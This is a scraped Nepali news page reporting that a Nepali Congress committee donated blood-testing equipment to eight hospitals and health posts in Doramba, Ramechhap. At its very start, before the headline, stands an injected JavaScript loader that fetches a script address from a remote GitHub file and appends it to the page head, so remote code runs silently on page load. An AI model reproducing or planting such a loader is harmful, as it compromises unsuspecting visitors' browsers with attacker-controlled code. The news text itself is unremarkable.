;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दोरम्बाका आठ वटै अस्पतालहरुलाई कांग्रेसद्वरा स्वास्थ्य सामाग्री – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • दोरम्बाका आठ वटै अस्पतालहरुलाई कांग्रेसद्वरा स्वास्थ्य सामाग्री
ट्रेन्डिङ

दोरम्बाका आठ वटै अस्पतालहरुलाई कांग्रेसद्वरा स्वास्थ्य सामाग्री

माघ २५,

रामेछाप । रामेछापको दोरम्बा गाउँपालिकाका अस्पताहरुलाई स्वास्थ्य सामाग्री हस्तान्तरण गरिएको छ ।

नेपाली कांग्रेस रामेछाप-काठमाडौं सम्पर्क समितिले गाउँपालिकाका कांग्रेस नेतृत्वलाई उपलब्ध गराएको स्वास्थ्य सामाग्री आइतबार (आज) एक कार्यक्रमकाबीच गाउँपालिका अन्तर्गत संचालनमा रहेका आठ वटै अस्पताल तथा स्वास्थ्य चौकीहरुलाई स्वास्थ्य सामाग्री हस्तान्तरण गरिएको स्थानी कांग्रेसका नेता नरेश श्रेष्ठले जुनेली न्युजलाई जानकारी दिए ।

उनका अनुसार रगत परीक्षण गर्ने अत्याधुनिक मेसिन/सामाग्री अस्पतालहरुलाई दिइएको हो ।

फेसबुक प्रतिक्रियाहरु